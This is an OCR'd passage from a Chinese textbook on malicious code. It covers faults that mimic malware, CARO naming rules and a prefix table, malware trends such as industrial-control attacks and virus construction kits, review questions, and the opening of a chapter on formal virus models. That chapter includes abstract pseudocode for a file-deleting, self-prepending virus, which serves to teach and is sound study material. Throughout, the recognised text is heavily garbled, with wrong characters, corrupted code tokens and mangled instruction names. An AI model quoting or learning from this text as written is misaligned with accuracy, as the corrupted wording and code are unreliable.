1.6.3 与 恶意 代码 现象 类 似 的 软件 故障 


软件 故障 的 范围 比较 广泛 ,问题 出 现 也 比较 多 ,所 以 诊断 就 非常 困难 。 对 软件 故障 的 辩 
认 和 修复 是 一 件 很 难 的 事情 ,需要 用 户 具 备 足 够 的 软件 知识 和 丰富 的 计算 机 使 用 经 验 。 这 
里 介绍 一 些 常见 的 软件 故障 症状 。 

1. 软件 程序 已 被 破坏 

由 于 人 磁 ( 光 ) 盘 质量 等 问题 ,文件 的 数据 部 分 丢失 ,而 程序 仍 能 运行 ,但 这 时 继续 执行 该 
程序 就 会 出 现 不 正常 现象 。 例 如 ,Format 程序 被 破坏 后 , 厂 继 续 执 行 , 会 格式 化 出 非 标准 格 
式 的 磁盘 ,进而 产生 一 连 串 的 错误 。 
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2. 软件 与 操作 系统 不 兼容 

由 于 操作 系统 日 员 的 特点 ,使 软件 过 多 地 受 其 环境 的 限制 ,在 某 个 操作 系统 下 可 正常 运 
行 的 软件 ,到 男 一 个 系统 下 却 不 能 正常 运行 ,许多 用 户 就 怀疑 是 由 恶意 代码 引起 的 。 例 如 ， 
32 位 系统 下 正常 运行 的 程序 ,复制 到 64 位 系统 后 ,一 般 都 不 能 正常 运行 。 

3. 引导 过 程 故 障 

系统 引导 时 屏 硕 显示 “Missing operating system”( 操 作 系 统 丢 失 ) ,故障 原因 是 硬盘 的 
主 引 导 程 序 可 完成 引导 ,但 无 法 找到 系统 的 引导 记录 。 

4. 使 用 不 同 的 编辑 软件 导致 错误 

用 户 用 一 些 编辑 软件 编辑 源 程 序 时 ,编辑 系统 会 在 文件 的 特殊 地 方 做 上 一 些 标记 。 这 
样 当 源 程序 编译 或 解释 执行 时 就 会 出 错 。 

在 学 习 、 使 用 计算 机 的 过 程 中 ,可 能 还 会 遇 到 许 许多 多 与 恶意 代码 现象 相似 的 软 硬 件 故 
障 , 所 以 用 户 要 多 阅读 、 参 考 有 关 资 料 , 了解 恶意 代码 的 特征 ,并 注意 在 学 习 、 工 作 中 积累 经 
验 ,就 不 难 区 分 恶意 代码 现象 与 软件 故障 、 便 件 故 障 现 象 了 。 


1.7 恶意 代码 的 命名 规则 


由 于 没有 一 个 专门 的 机 构 负 责 给 恶意 代码 命名 ,因此 ,恶意 代码 的 名 称 很 不 一 致 。 恶 意 
代码 的 传播 性 意味 看 它们 可 能 同时 出 现在 多 个 地 点 或 者 同时 被 多 个 研究 者 发 现 。 这 些 人 研究 
者 更 关心 的 是 如 何 增 强 他 们 产品 的 性 能 使 其 能 对 付 最 新 出 现 的 恶意 代码 ,而 并 不 关心 是 否 
应 该 给 这 个 恶意 代码 定义 一 个 世界 公认 的 名 称 。 第 一 个 IBM PC 上 的 病毒 一 一 巴基斯坦 脑 
病毒 ,也 被 称 为 脑病 毒 项 童 病毒 .克隆 病毒 或 土 牢 病毒 。Happy99 蠕虫 是 一 种 攻击 代码 ， 
也 被 称 为 Ska 或 Worm。 由 此 可 见 , 一 种 恶意 代码 有 多 个 名 称 是 非常 普遍 的 事情 ,如 果 只 
有 一 个 名 称 反 而 显得 不 太 正 常 了 。 在 这 些 名 称 中 ,最 常用 的 名 称 往往 被 称 为 正式 名 称 , 而 其 
他 名 称 都 是 别名 。 这 种 命名 的 不 一 致使 得 人 们 讨论 起 来 非常 困难 ,因为 多 个 名 称 让 人 和 弄 不 
清 究竟 指 的 是 哪个 恶意 代码 。 

在 恶意 代码 出 现 的 初期 ,大 多 数 恶意 代码 是 以 代码 中 发 现 的 文字 字符 来 命名 的 。 有 了 时， 
恶意 代码 也 以 发 现 地 点 来 命名 ,但 这 会 使 得 恶意 代码 的 名 称 与 其 原 产 地 不 一 致 。 例 如 , 耶 路 
撤 冷 病毒 原 产 地 是 意大利 ,但 却 在 希 但 伦 大 学 首次 被 发 现 。 有 些 恶 意 代 码 是 以 其 作者 的 名 
字 来 命名 的 。 例 如 ,黑色 复仇 者 病毒 ,但 是 这 样 的 命名 方式 使 得 恶意 代码 作者 能 得 到 媒体 不 
应 有 的 注意 。 因 此 ,为 了 出 名 , 越 来 越 多 的 人 成 了 恶意 代码 制造 者 。 有 一 段 时 间 , 人 研究 者 用 
一 串 随 机 的 序列 号 或 代码 中 出 现 的 数字 来 命名 , 像 1302 病毒 。 这 种 方式 避免 了 恶意 代码 作 
者 在 媒体 上 获悉 他 的 作品 的 消息 ,但 这 同样 也 给 研究 者 和 非 研 究 者 带 来 了 不 便 ，。 

1991 年 ,计算 机 反 病 毒 研 究 组 织 (CComputer Antivirus Researchers Organization ， 
CARO) 的 一 些 资深 成 员 提 出 了 一 套 被 称 为 CARO 命名 规则 的 标准 命名 模式 。 虽 然 CARO 
并 不 实际 命名 ,但 它 提出 了 一 系列 命名 规则 来 帮助 研究 者 给 恶意 代码 命名 。 根 据 CARO 命 
名 规则 ,每 一 种 恶意 代码 的 命名 包括 5 个 部 分 。 

(1) 家 族 名 。 

(2) 组 名 。 
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(3) 大 变种 。 

(4) 小 变种 。 

(5) 修改 者 。 

CARO 规则 的 一 些 附 加 规则 包括 以 下 内 容 。 

(1) 不 用 地 点 命名 。 

(2) 不 用 公司 或 商标 命名 。 

(3) 如 果 已 经 有 了 名 称 就 不 再 男 定义 别名 。 

(4) 变种 是 子 类 。 

例如 ,精灵 (Cunning) 病 毒 是 瀑布 (Cascade) 病 毒 的 变种 , 它 在 发 作 时 能 奏 乐 ,因此 被 命 
名 为 Cascade. 1701. A。Cascade 是 家 族 名 ,1701 是 组 名 。 因 为 Cascade 病毒 的 变种 大 小 不 
一 (如 1701、1704、1621 等 ) ,所 以 用 该 值 来 表示 组 名 。A 表示 该 病毒 是 某 个 组 中 的 第 一 个 变 
种 。 耶 路 撤 冷 圣 褒 病 毒 则 被 命名 为 Jerusalem. 1808. Apocalypse。 

虽然 关于 恶意 代码 命名 的 会 议 对 统一 命名 提供 了 帮助 ,但 是 由 于 感染 恶意 代码 的 途径 
非常 多 ,因此 反 病 毒 软 件 商 们 通常 在 CARO 命名 的 前 面 加 一 个 前 组 来 标明 病毒 类 型 。 例 
如 ,WM 表示 MS Word 宏 病毒 , Win32 指 32 位 Windows 病毒 ,VBS 指 VB 恶意 脚本 。 这 
样 , 美 丽 莎 病毒 的 一 个 变种 的 命名 就 成 了 W97M. Melissa. AA, Happy99 蠕虫 就 被 称 为 
Win32. Happy99. Worm , 而 一 种 VB 恶意 脚本 FreeLinks 就 成 了 VBS. FreeLinks。 表 1-1 
列 出 了 反 病 毒 厂 商 们 常用 的 恶意 代码 名 称 前 级 。 


表 1-1 恶意 代码 名 称 前 组 


前 组 描 述 
AM Access 宏 病 毒 
AOL 专门 针对 美国 在 线 的 恶意 传播 代码 
Backdoor 后 门 病毒 
BAT 用 DOS 的 批 处 理 语句 编写 的 病毒 
Boot DOS 引导 区 型 病毒 
HIL 用 高 级 语言 编写 的 蠕虫 .木马 
HACK 黑客 病毒 
JAVA 用 Java 编写 的 恶意 代码 
JS 用 JavaScript 写 的 恶意 脚本 
PWSTEAL 盗 取 口 令 的 木马 
SCRIPT 脚本 病毒 
TRO 一 般 木 马 
VBS Visual Basic 恶意 脚本 或 蠕虫 
W32/WIN32 所 有 可 以 感染 32 位 平台 的 32 位 恶意 代码 
W95/W98/W9X Windows 9x 和 Windows Me 亚 意 代码 
WIN/WIN16 Windows 3. x 专 有 恶意 代码 
WM Word 宏 病毒 
WNT/WINNT Windows NT 专 有 恶意 代码 
W2K Windows 2000 恶意 代码 
XF Excel 公式 恶意 代码 
XM Excel 宏 病 毒 
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例如 ,W95. CIH 这 个 名 称 表 明 , 它 是 利用 Windows 95 API 编写 而 成 的 。CIH 病毒 在 
Windows 9x 和 Windows NT 平台 上 进行 传播 ,但 是 不 会 对 Windows NT 系统 产生 危害。 

VGrep 是 各 大 厂商 对 恶意 代码 命名 方式 的 一 种 新 尝试 。 这 种 方法 将 已 知 的 恶意 代码 
名 称 通 过 某 种 方法 关联 起 来 ,其 目的 是 不 管 什 么 样 的 扫描 软件 都 能 按照 可 被 识别 的 名 称 链 
进行 扫描 。VGrep 将 恶意 代码 文件 读 入 并 用 不 同 的 扫描 器 进行 扫描 ,扫描 的 结果 和 被 识别 
出 的 信息 放 和 数据库 中 。 对 每 种 扫描 需 的 扫描 结果 进行 比较 ,并 将 结果 用 作 病 毒 名 交叉 引 
用 表 。VGrep 的 参与 者 赞同 为 每 一 种 恶意 代码 命名 一 个 最 通用 的 名 称 , 采 用 VGrep 命名 方 
式 将 对 在 世界 范围 内 跟踪 多 个 恶意 代码 的 一 致 性 很 有 帮助 。 


1.8 恶意 代码 的 最 新 趋势 


在 恶意 代码 的 发 展 史上 ,恶意 代码 的 出 现 是 有 规律 的 。 一 般 情况 下 ,一 种 新 的 恶意 代码 
技术 出 现 后 ,采用 新 技术 的 恶意 代码 会 迅速 发 展 ,接着 反 恶 意 代 码 技术 的 发 展会 抑制 其 流 
传 。 操 作 系统 进行 升级 时 ,恶意 代码 也 会 调整 为 新 的 方式 ,产生 新 的 攻击 技术 。 恶 意 代 码 的 
发 展 趋势 是 和 信息 技术 的 发 展 相关 的 。 

就 近 几 年 的 恶意 代码 来 看 ,当前 的 恶意 代码 发 展 趋势 如 下 。 

1. 网 络 化 发 展 

新 时 期 的 恶意 代码 充分 利用 计算 机 技术 和 网 络 技 术 。2000 年 以 后 ,通过 网 络 漏洞 和 邮 
件 系 统 进行 传播 的 蠕虫 成 为 “新 宠 ”, 数 量 上 已 经 远 远 超过 了 曾经 是 主流 的 文件 型 病毒 。 在 
2003 一 2004 年 的 流行 恶意 代码 列表 中 ,有 一 半 以 上 是 蠕虫 。2005 年 以 来 ,木马 成 为 最 流行 
的 恶意 代码 。 得 益 于 国内 安全 浏览 器 的 普及 和 第 三 方 打 补 丁 工具 的 普及 ,2010 年 以 来 , 针 
对 国内 用 户 的 挂 马 攻 击 的 事件 呈现 持续 大 幅 下 降 的 趋势 ,但 2015 年 以 来 ,网 页 挂 马 攻 击 在 
国内 又 开始 重新 流行 ,并 呈现 一 定 程度 的 爆发 趋势 ,甚至 出 现 运营 商 被 挂 马 的 安全 事件 。 说 
明 在 网 络 技术 发 展 的 同时 ,网 络 安全 防御 措施 未 及 时 跟 上 ,网 络 防 毒 将 成 为 今后 网 络 管理 工 
作 的 重点 。 

2. 专业 化 发 展 

2003 年 ,媒体 报道 发 现 了 第 一 例 感染 手机 的 恶意 代码 ,由 于 当时 手机 设备 采用 艇 入 式 
操作 系统 并 且 软 件 接口 较 少 ,以 往 很 少 有 恶意 代码 制造 者 涉足 这 个 领域 。 同 时 ,2001 年 以 
来 针对 工业 控制 系统 (ICS) 的 病毒 \ 木马 等 攻击 行为 也 大 幅 增 长 : 2007 年 ,攻击 者 入 侵 加 拿 
大 一 个 水 利 SCADA 控制 系统 ,破坏 了 取水 调度 的 控制 计算 机 ; 2008 年 ,攻击 者 入侵 波兰 某 
城市 地 铁 系 统 , 通 过 电视 遥控 器 改变 轨道 扳 道 器 , 致 四 节 和 车 厢 脱 轨 ; 2010 年 ,出 现 了 专门 攻 
击 西门 子 工 业 控 制 系统 的 Stuxnet 病毒 ,也 称 为 震 网 病毒 。2011 年 ,微软 发 现 的 Duqu 病毒 
可 从 工业 控制 系统 制造 商 收 集 情报 数据 。2012 年 5 月 被 发 现 的 计算 机 病毒 一 一 Flame 火 
焰 病 毒 被 定性 为 “工业 病毒 ”, 它 构造 复杂 ,可 以 通过 USB 存储 器 以 及 网 络 复制 和 传播 ,并 能 
接收 来 自 世 界 各 地 多 个 服务 器 的 指令 。IBM 安全 管理 服务 (MSS) 数 据 显 示 , 截 至 2016 年 
11 月 30 日 ,针对 工业 控制 系统 的 攻击 数量 比 2015 年 增长 了 110%。2017 年 11 月 ,一 款 针 
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对 ICS 量 身 定做 的 恶意 软件 一 一 TRISIS( 又 称 为 TRITON) 被 发 现 , 它 将 目标 锁定 在 施耐德 
电气 的 Triconex 安全 仪表 控制 系统 (SIS) ,从 而 能 够 更 换 最 终 控制 元 素 中 的 逻辑 。 

3. 简单 化 发 展 

与 传统 计算 机 病毒 不 同 的 是 ,许多 恶意 代码 是 利用 当前 最 新 的 编程 语言 与 编程 技术 来 
实现 的 ,它们 易于 修改 以 产生 新 的 变种 ,从 而 避 开 安全 防范 软件 的 搜索 。 例 如 ,“ 爱 虫 ”* 是 用 
VBScript 语言 编写 的 ,只 要 通过 Windows 日 市 的 编辑 软件 修改 恶意 代码 中 的 一 部 分 ,就 能 
轻而易举 地 制造 出 新 变种 ,以 躲避 安全 防范 软件 的 追击 。 

不 法 分 子 甚至 还 提供 了 一 些 工 具 包 ,进一步 降低 了 利用 恶意 代码 进行 攻击 的 入 门 门槛 。 
如 2010 年 被 首次 发 现 的 Blackhole 就 是 一 个 恶意 程序 工具 包 , 可 以 被 添加 到 恶意 的 或 被 攻 
击 的 网 站 中 ,然后 利用 各 种 各 样 的 浏览 硕 漏 洞 ,按照 客户 的 要 求 安装 指定 的 恶意 软件 。 多 年 
来 ,Blackhole 是 造成 大 部 分 恶意 软件 感染 和 银行 任 证 被 盗 的 罪魁 祸首 。2017 年 肆虐 一 时 
的 WannaCry、Petya 等 勒索 病毒 及 其 变种 都 是 通过 之 前 泄露 的 NSA 黑客 攻击 工具 ,利用 系 
统 漏 洞 在 网 络 上 快速 传播 的 。 

4. 多 样 化 发 展 

新 恶意 代码 可 以 是 可 执行 程序 .脚本 文件 .HTML 网 页 等 多 种 形式 ,并 正 向 电子 邮件 、 
网 上 贺卡 .卡通 图 片 . 即 时 信息 等 发 展 。2016 年 ,在 钓鱼 邮件 中 使 用 脚本 附件 是 恶意 代码 传 
播 方 法 的 最 大 改变 之 一 。 这 些 脚 本 通常 驻 留 在 压缩 文件 中 ,一 旦 打开 并 触发 了 它们 ,它们 会 
访问 远程 服务 带 ,并 在 系统 中 下 载 和 安装 恶意 软件 。 

5. 自动 化 发 展 

以 前 的 恶意 代码 制作 者 都 是 专家 ,编写 恶意 代码 在 于 表现 目 己 高 超 的 技术 。 但 是 “ 库 尔 
尼 科 娃 ” 病 毒 的 设计 者 不 同 , 他 只 是 下 载 了 VBS 蠕虫 旷 化 器 并 加 以 使 用 ,该 恶意 代码 就 诞生 
了 。 据 报道 ,VBS 蠕虫 孵化 兹 被 人 们 从 VXHeavens 上 下 载 了 15 万 次 以 上 。 正 是 由 于 这 类 
工具 太 容 易 得 到 ,使 得 现在 新 恶意 代码 出 现 的 频率 超出 以 往 任 何 时 候 。 迄 今 为 止 ,第 见 的 病 
毒 机 包括 VCS(CVirus Construction Set , 病毒 构造 工具 箱 )\GenVir、VCL(Virus Creation 
Laboratory ,病毒 制造 实验 室 )、PS-MPC(Phalcon-Skism Mass-Produced Code Generator) 、 
NGVCK(Next Generation Virus Creation Kit, 下 一 代 病 毒 机 )、VBS 蠕虫 多 化 器 等 。 

6. 犯罪 化 发 展 

卡巴 斯 基 实 验 室 的 David Emm 指出 ,恶意 代码 的 发 展 目标 ,已 经 从 原来 单纯 的 恶意 玩 
突 或 者 破坏 ,演变 为 有 组 织 的 、 受 利益 驱使 的 分工 明确 的 网 络 犯罪 行为 。 网 络 犯 罪 已 逐渐 
向 国际 化 和 和 集团 化 发 展 ,他 们 通过 盗用 身份 以 及 诈骗 .勒索 非法 广告 和 虚拟 财产 盗 锚 \ 伪 己 
网 络 等 手段 获取 经 济 利益 。 针 对 网 络 犯 罪 的 发 展 ,David 认为 它 已 经 发 展 成 为 一 种 产业 ,并 
已 经 形成 了 一 个 分 工 明 细 、 精 确 的 产业 链条 (图 1-1) 。 

TrendLabs 在 《2017 年 度 安 全 报告 》 中 指出 ,在 中 东 及 北非 一 带 已 经 形成 了 Malware- 
as-a-Service (MaaS) 的 交易 市 场 。 

McAffe 的 James Lewis 指出 ,网 络 犯罪 正在 损害 全 球 经 济 ,2017 年 度 网 络 犯罪 对 全 球 
造成 了 接近 6000 亿美 元 的 损失 ,是 全 球 GDP 的 0.8%。 
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简 答 题 
1. 在 理解 恶意 代码 和 计算 机 病毒 二 者 异同 点 的 基础 上 ,说 明 为 什么 需要 引入 恶意 代码 
的 概念 ? 
.恶意 代码 的 定义 是 什么 ?列举 尽 可 能 多 的 恶意 代码 种 类 。 
.当前 ,恶意 代码 表现 出 什么 样 的 发 展 趋势 ? 
仔细 阅读 恶意 代码 的 发 展 历 史 ,并 列举 其 中 重要 的 关键 环节 。 
. 根据 恶意 代码 命名 规则 ,解读 “Win32. Happy99. Worm” 的 含义 。 


[BY) 


A 


宙 2 草 恶意 代码 模型 及 机制 


对 恶意 代码 理论 模型 的 研究 分 为 制作 模型 的 研究 和 防范 模型 的 研究 。 依 据 恶 意 代码 发 
展 的 轨迹 ,研究 者 最 先 用 形式 化 的 数学 方法 描述 传统 计算 机 病毒 的 理论 模型 。1987 年 ， 
Fred Cohen 开始 了 传统 计算 机 病毒 的 学 术 人 研究 ,他 定义 了 一 个 抽象 计算 机 病毒 ,并 证 明了 
计算 机 病毒 检测 的 不 确定 性 ,指出 没有 对 付 计 算 机 病毒 的 万 能 药 。Cohen 理论 的 最 大 贡献 
是 证 明了 计算 机 病毒 的 不 确定 性 。Ferenc 提出 了 基于 图 灵机 模型 的 计算 机 病毒 理论 ,该 理 
论 非常 适合 探讨 病毒 和 现 有 计算 机 体系 之 间 的 关系 。Adleman 另辟蹊径 ,提出 了 基于 递归 
图 数 的 计算 机 病毒 理论 。 本 音 将 详细 介绍 计算 机 病毒 的 各 种 理论 模型 ,例如 ,基于 图 灵机 的 
计算 机 病毒 的 计算 模型 .基于 递归 了 哺 数 的 计算 机 病毒 的 数学 模型 和 Internet 中 的 蠕虫 传播 
模型 。 这 些 模型 有 利于 进一步 深入 理解 恶意 代码 \ 人 研究 恶意 代码 的 工作 机 制 。 

本 章 学 习 目 标 

(1) 掌握 传统 计算 机 病毒 的 抽象 描述 。 

(2) 掌握 基于 图 灵机 的 计算 机 病毒 模型 。 

(3) 了 解 基于 递归 函数 的 计算 机 病毒 模型 。 

(4) 掌握 网 络 蠕虫 传播 模型 。 

(5) 掌握 恶意 代码 的 预防 理论 模型 。 

(6) 擎 握 恶 意 代 码 的 程序 结构 。 


2.1 基本 定义 


为 了 说 明 本 节 后 面 的 问题 ,此 处 给 出 一 个 虚拟 案例 。 

一 个 文本 编辑 程序 被 传统 计算 机 病毒 感染 了 。 每 当 使 用 文本 编辑 程序 时 , 它 总 是 先进 
行 感染 工作 并 执行 编辑 任务 ,其 间 , 它 将 搜索 合适 文件 以 进行 感染 。 每 一 个 新 被 感染 的 程序 
都 将 执行 原 有 的 任务 ,并 且 也 搜索 合适 的 程序 进行 感染 ,这 种 过 程 反 复 进行 。 当 这 些 被 感染 
的 程序 跨 系 统 传播 ,被 销售 ,或 者 送 给 其 他 人 时 ,将 产生 病毒 扩散 的 新 机 会 。 最 终 , 在 1990 
年 1 月 1 日 以 后 ,被 感染 的 程序 终止 了 先前 的 活动 。 现 在 ,每 当 这 样 的 一 个 程序 执行 时 , 它 
将 删除 所 有 文件 。 

这 样 的 一 个 传统 计算 机 病毒 可 用 伪 代 码 表 示 如 下 。 


{main: = 
Call injure; 
Call submain; 
Call infect; 
} 


{injure: = 
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If condition then whatever damage 1s to be done and haj]t; 
} 

{infect: = 

If condition then infect files; 

} 


对 于 上 面 的 案例 而 言 ,病毒 的 伪 代 码 表示 为 : 


{main: = 
Call injure; 
Call submain; 
Call infect; 
} 
{injure: = 
If date>= Jan. 1,1990 then 
While file != 0 
File = get ~ random— file; 
Delete file; 
Halt; 
} 
{infect: = 
If true then 
File = get~ random ~ executable ~ file; 
Rename main routine submain; 
Prepend self to file; 
} 


通过 改变 上 述 伪 代 码 , 可 以 产生 很 多 种 不 同 的 病毒 ,甚至 可 以 产生 有 益 的 病毒 。 下 面 的 
伪 代 码 是 经 过 微小 改变 而 形成 的 压缩 病毒 ,这 种 病毒 可 以 节省 存储 空间 。 


{main: = 
Call injure; 
Decompress compressed part of program; 
Call submain; 
Call infect; 
} 
{injure: = 
If false then halt; 
} 
{infect: = 
If executable != 0 then 
File = get ~ random— executable ~ file; 
Rename main routine submain; 
Compress file; 
Prepend self to file; 
} 


综观 上 述 3 种 病毒 伪 代 码 ,非常 明显 ,有 如 下 一 些 相关 性 质 。 

(1) 对 于 每 个 程序 ,都 存在 该 程序 相应 的 感染 形式 。 即 可 以 把 病毒 看 作 是 一 个 程序 到 
一 个 被 感染 程序 的 映射 。 

(2) 每 一 个 被 感染 程序 在 每 个 输入 (这 里 的 输入 是 指 可 访问 信息 ,如 用 户 输入 、 系 统 时 
钟 .数据 或 程序 文件 等 ) 上 形成 如 下 3 个 选择 。 
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Q@ 破坏 (Injure) : 不 执行 原先 的 功能 ,而 去 完成 其 他 功能 。 任 何 一 种 输入 导致 破坏 以 
及 破坏 的 形式 都 与 被 感 当 的 程序 无 关 , 而 只 与 病毒 本 身 有 关 。 

@ 传染 (Infect) : 执行 原先 的 功能 ,并 且 如 果 程 序 能 终止 , 则 传染 程序 。 对 于 除 程序 以 
外 的 其 他 可 访问 信息 (如 时 钟 .用户 /程序 间 的 通信 ) 的 处 理 , 同 感染 前 的 源 程序 一 样 。 另 外 ， 
不 管 被 感染 的 程序 其 原先 功能 如 何 ( 文 本 编辑 或 编 详 天 等 ) , 当 它 传染 其 他 程序 时 ,其 结果 是 
一 样 的 。 也 就 是 说 ,一 个 程序 被 感染 的 形式 与 感染 它 的 程序 无 关 。 

@ 模仿 (Imitate) : 既 不 破坏 也 不 传染 ,不 加 修改 地 执行 原先 的 功能 。 这 也 可 看 作 是 传 
染 的 一 个 特例 ,其 中 被 传染 的 程序 个 数 为 零 。 


2.2 基于 图 灵机 的 传统 计算 机 病毒 模型 


在 实际 计算 机 环境 中 ,特定 程序 间 的 连接 主要 徘 操 作 系 统 来 管理 。 多 数 操作 系统 中 的 
程序 是 可 以 修改 其 他 程序 或 数据 文件 的 。 例 如 ,一 些 特殊 程序 (如 计算 机 病毒 ) 就 利用 了 操 
作 系 统 的 这 种 便利 特性 。 为 了 分 析 这 些 能 够 修改 其 他 程序 的 程序 ,定义 了 一 个 新 的 计算 机 
模型 。 这 个 新 引进 的 数学 模型 称 为 市 后 台 存 储 副 随机 访问 存储 程序 计算 机 (Random 
Access Stored Program Machine with Attached Background Storage, RASPM ABS)., 

本 节 介 绍 新 模型 中 用 到 的 随机 访问 计算 机 、 随 机 访问 存储 程序 计算 机 以 及 图 灵机 的 重 
要 特征 ,同时 表明 这 些 模型 是 很 适用 的 ,它们 不 但 可 以 产生 分 析 结 果 , 而 且 能 够 精确 地 反映 
真实 计算 机 的 显 着 特征 。 


2.2.1 随机 访问 计算 机 模型 


1946 年 2 月 14 日 ,世界 上 第 一 台电 子 数 字 积 分 计算 机 ENIAC(Electronic Numerical 
Integrator and Calculator) 在 美国 宾夕法尼亚 大 学 诞生 。ENIAC 完全 符合 RAM 模型 ,是 
一 款 不 能 被 病毒 感染 的 电子 计算 机 。ENIAC 百 毒 不 侵 的 原因 在 于 随机 访问 计算 机 
(Random Access Machine,RAM) 模 型 是 一 种 带 有 累加 器 的 计算 机 模型 ,并 日 在 该 模型 中 指 
令 不 能 日 我 修改 。RAM 由 一 个 只 读 输 入 带 、 只 写 输出 带 以 及 一 个 程序 和 一 台 存 储 妖 所 构 
成 ,如 图 2-1 所 示 。 


程序 (不 能 
存储 在 存 


储 硕 中 ) 


输出 囊 


2-1 随机 访问 计算 机 (RAM) 模 型 
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RAM 模型 的 程序 不 仅 可 以 从 输入 带 上 读 取 数据 ,并 将 结果 数据 写 到 输出 带 上 ,而 且 它 
还 能 读 或 修改 存储 表单 元 的 内 容 。 输 入 带 是 逻辑 单元 序列 ,每 个 逻辑 单元 中 都 有 一 个 整数 。 
市 头 在 输入 市 上 读 取 到 一 个 符号 后 ,就 会 问 右 移动 一 个 逻辑 单元 。 输 出 刘 是 一 个 包含 逻辑 
单元 的 只 写 珊 ,只 不 过 这 些 逻 辑 单元 开始 都 是 空白 的 。 当 开始 执行 写 指令 时 ,就 会 问 当 前 囊 
头 所 指 回 的 逻辑 单元 中 输入 一 个 整数 ,并 且 带 头 也 会 回 右 移动 一 位 。 这 就 意味 大 输 入 字符 
只 能 被 谈 取 一 次 ,而 且 一 旦 输出 字符 写 到 输出 珊 上 ,就 不 能 再 改变 。 

由 于 RAM 模型 的 程序 并 不 是 存储 在 存储 器 中 的 ,所 以 必须 明确 该 模型 的 程序 是 不 能 
自我 修改 的 , 它 仅 仅 是 一 个 指令 序列 。 每 条 指令 包含 两 个 部 分 : 操作 码 和 地 址 。 假 设 操作 
码 是 用 来 识别 算术 符号 、 处 理 输入 和 输出 带 的 指令 。 指 令 地 址 是 识别 程序 中 其 他 指令 所 在 
位 置 的 标号 ,该 标号 通常 被 用 在 指令 流 中 。 其 他 指令 的 地 址 可 能 是 一 个 操作 数 , 或 者 能 够 被 
忽略 挥 。 表 2-1 是 RAM 模型 的 典型 指令 集 。 原 则 上 ,可 以 不 改变 问题 的 复杂 度 , 而 以 当今 
计算 机 中 的 指令 (如 人 逻辑 和 字符 指令 ) 来 探讨 RAM 模型 的 指令 集合 。 因 此 , 表 中 RAM 模 
型 指令 的 精确 含义 并 不 重要 。 

表 2-1 随机 访问 计算 机 (RAM) 的 指令 集 


LOAD 将 操作 数 指定 的 值 装 人 累加 器 

STORE 将 存储 在 累加 器 中 的 值 复 制 到 操作 数 指定 的 单元 中 

ADD 将 操作 数 指定 的 值 加 到 累加 器 中 

SUB 从 累加 器 中 减 去 操作 数 指定 的 值 

MULT 用 操作 数 指定 的 值 与 累加 器 中 的 值 相 乘 

DIV 用 操作 数 指定 的 值 除 以 累加 器 中 的 值 

READ 将 输入 带 上 的 值 读 人 操作 数 指定 的 单元 中 

WRITE 将 操作 数 指定 的 值 写 到 输出 带 上 

JUMP 修改 指令 指针 使 其 指向 标号 所 指定 的 值 

Wr 如 果 累 加 器 中 的 值 为 正 , 那 么 修改 指令 指针 指向 标号 所 指定 的 值 
JZERO 如 果 累 加 器 中 的 值 为 零 ,那么 修改 指令 指针 指向 标号 所 指定 的 什 
HALT | 一 | 停机 


指令 中 的 操作 数 可 能 是 以 下 几 种 形式 之 一 。 

(1) i: 表示 整数 i 本身 。 

(2) [zj: 表示 寄存 器 i 的 内 容 ,其 中 i 是 正 整 数 。 

(3) [[ijj: 表示 间接 寻 址 ,寄存 器 i 内 容 中 的 内 容 。 也 就 是 说 ,操作 数 是 寄存 器 j 的 内 
容 , 而 7 是 在 寄存 更 i 中 发 现 的 整数 。 如 果 j 二 0, 则 停机 。 

在 初始 阶段 ,所 有 的 寄存 器 都 将 被 置 为 0, 并 使 指令 指针 指向 P 的 第 一 条 指令 ,而 且 输 
出 带 是 空白 的 。 在 完成 PP 的 第 & 条 指令 后 ,除非 第 & 条 指令 是 JUMP、HALT、JGTZ 或 
JZER0 ,和 否则 指令 指针 就 会 自动 地 指向 第 (R 十 1) 条 指令 。 遇 到 HALT 指令 ,计算 机 将 停止 
运行 。 执 行 到 JUMP 指令 ,或 者 当 JGTZ 或 JZER0 指令 的 条 件 满足 时 ,指令 指针 将 指向 分 
支 标号 所 指定 的 值 。 


2.2.2 随机 访问 存储 程序 模型 


在 RAM 模型 中 ,因为 程序 并 不 是 存储 在 存储 带 中 的 ,所 以 它 不 能 日 我 修改 ,因此 ,也 不 
可 能 被 计算 机 病毒 感染 。 现 在 ,来 考虑 计算 机 的 另 一 种 被 称 为 随机 访问 存储 程序 的 计算 机 
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(Random Access Stored Program Machine,RASPM) 模 型 。 除 了 程序 能 存储 在 存储 天 中 
外 ,该 模型 具有 RAM 模型 的 所 有 特性 ,并 有 日 RASPM 程序 能 够 自我 修改 ,如 图 2-2 所 示 。 
RASPM 不 需要 间接 寻 址 (因为 程序 可 以 修改 目 身 ,所 以 间接 寻 址 可 以 被 仿真 ) 。 


程序 (能 
储 在 存储 


硕 中 ) 


得 出 囊 


图 2-2 随机 访问 存储 计算 机 (RASPM) 模 型 


RAM 程序 与 RASPM 程序 的 计算 复杂 度 存 在 常数 倍数 关系 。 也 就 是 说 ,如 果 某 个 问 
题 在 RAM 上 执行 需要 的 时 间 复 杂 度 为 T(n) ,那么 它 在 RASPM 上 运行 所 需 的 时 间 复 杂 度 
就 是 kT(n) ,其 中 上 为 常数 。 

定理 2.1 如 果 指 令 的 花费 是 一 致 的 或 者 对 数 的 ,那么 对 所 有 时 间 复 杂 度 为 工 (z) 的 
RAM 程序 而 言 ,存在 时 间 复 杂 度 为 kT(n) 的 RASPM 程序 ,其 中 为 常量 。 

定理 2.2 ”如果 指 令 的 花费 是 一 致 的 或 者 对 数 的 ,那么 对 所 有 时 间 复 杂 度 为 了 (z) 的 
RASPM 程序 而 言 , 存 在 时 间 复 杂 度 为 kT(n) 的 RAM 程序 ,其 中 为 常量 。 


2.2.3 图 灵机 模型 


图 灵机 (Turing Machine,TM) 是 基于 有 限 状 态 自 动机 提出 的 ,也 就 是 说 ,在 读 写 附加 磁 
市 的 同时 TM 修改 自己 的 实际 状态 。 当 且 仅 当 所 有 的 输入 符号 都 被 读 和 人 并 且 转 入 一 个 接 
收 状 态 时 ,TM 接收 这 个 输入 字符 串 。 从 字面 上 看 ,TM 有 多 种 形式 的 定义 ,但 是 ,从 本 质 上 
来 看 图 灵机 可 以 用 如 图 2-3 所 示 的 模型 来 表示 ,TM 包含 一 个 有 限 控 制 器 一 条 被 分 为 若干 
单元 的 输入 膏 和 一 个 每 次 扫 摘 一 个 单元 的 市 头 。 


2-3 基本 图 灵机 模型 


对 于 这 里 所 讨论 的 单 向 图 灵机 而 言 ,输入 市 有 一 个 最 左 单元 ,但 其 右 端 是 无 穷 的 。 市 的 
